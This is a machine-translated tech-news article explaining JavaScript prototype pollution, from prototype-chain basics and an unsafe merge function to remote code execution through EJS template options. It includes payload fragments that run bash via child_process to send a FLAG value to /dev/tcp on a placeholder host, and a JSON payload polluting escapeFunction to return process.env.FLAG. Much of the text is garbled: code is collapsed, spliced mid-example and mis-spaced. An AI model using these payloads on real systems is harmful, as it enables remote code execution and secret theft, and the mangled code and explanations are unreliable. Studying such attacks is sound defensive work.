Shulou(Shulou.com)06/01 Report--

In this issue, the editor will bring you about what the JavaScript Prototype pollution attack is like. The article is rich in content and analyzed and described from a professional point of view. I hope you can get something after reading this article.

0x00 text

Prototype and prototype chain

In JavaScript, if we want to define a class, we need to define it as a "constructor". That is, if we define a function, there will be a corresponding class with the name of the function.

Prototype

Each function object has a prototype property that points to the prototype of the instantiation of the builder function. When you use this builder to instantiate an object, you inherit the properties and methods in the prototype.

All objects have a _ _ proto__ attribute, which points to the prototype of the build function that created it.

In P God's introduction of JavaScript prototype pollution attack, we can know the following two properties.

Prototype is a property of a class, and all class objects will have properties and methods in prototype when instantiated.

The _ _ proto__ property of an object, which points to the prototype property of the class in which the object is located

Prototype chain

The so-called prototype chain also refers to a mechanism of inheritance and reverse search in JS. The function object can find the function prototype through the prototype attribute, and the ordinary instance object can find the prototype of its function through the _ _ proto__ attribute.

This lookup mechanism of JavaScript, which is used in object-oriented inheritance, is called prototype inheritance chain.

Each constructor has a prototype object (prototype)

The _ _ proto__ property of the object, which points to the prototype object prototype of the class

JavaScript uses prototype chain to implement inheritance mechanism

For details, please refer to the following illustration (see Appendix for links)

Prototype chain contamination

Prototype contamination refers to the ability to inject attributes into existing JavaScript language prototypes (such as objects).

JavaScript allows you to change all Object properties, including their magic properties, such as _ proto_,constructor and prototype.

In an application, if the attacker controls and modifies the prototype of an object, it will affect all objects that come from the same class or parent class as the object. All JavaScript objects inherit the attributes on the Object.prototype through the prototype chain inheritance. This kind of attack is prototype chain contamination.

When this happens, it may be used by attackers to inject attack code for the purpose of tampering with the program or executing commands.

The occurrence of prototype chain contamination

According to the p god article, prototype chain contamination is mainly due to the fact that attackers can set the value of _ _ proto__, resulting in pollution, so we should focus on where we can set the value of _ _ proto__, or look for certain objects that can control the operation of their key names.

For example:

Object merge

Object clone (merge the object to be operated on into an empty object)

For example:

If there is a merge operation:

Function merge (target, source) {for (let key in source) {if (key in source & & key in target) {merge (target [key], source [key])} else {target [key] = source [key]}

The key values are not filtered here, and prototype chain contamination can be done if key is _ _ proto__,.

It should be noted that in cooperation with JSON.parse, the _ _ proto__ we entered will be resolved to a key name. In the case of JSON parsing, _ _ proto__ will be regarded as a real "key name" rather than a "prototype", otherwise it will only be regarded as the "prototype" of the current object and will not be affected upward, for example:

> let O2 = {a: 1, "_ proto__": {b: 2}} > merge ({}, O2) o2.__proto__console.log ({} .b) let o3 = JSON.parse ('{"a": 1, "_ proto__": {"b": 2}') > merge ({}, o3) console.log ({} .b) / dev/tcp/xxxxx/xx\ ") /"}

The dynamic function stitched to the backend is:

Prepended + = 'var' + opts.outputFunctionName +'= _ _ append;' +'\ nexec / After injectionprepended + = 'var aplomb. MainModule.require (' child_process'). The following code ('bash-c\ "echo $FLAG > / mainModule.') / / is commented out.

After contaminating the prototype chain, the rendering directly becomes the execution code and return ahead of time, thus getshell

Method 3: opts.escapeFunction of backend RCE

You can also find another place.

Var escapeFn = opts.escapeFunction;var ctor;....if (opts.client) {src = 'escapeFn = escapeFn | |' + escapeFn.toString () +';'+'\ n' + src; if (opts.compileDebug) {src = 'rethrow = rethrow | |' + rethrow.toString () +';'+'\ n' + src;}

Fake escapeFunction can also call RCE.

{"constructor": {"prototype": {"client": true, "escapeFunction": "1; returnprocess.env.FLAG", "debug": true, "compileDebug": true} this is what the JavaScript Prototype pollution attack shared by Xiaobian is like. If you happen to have similar doubts, please refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.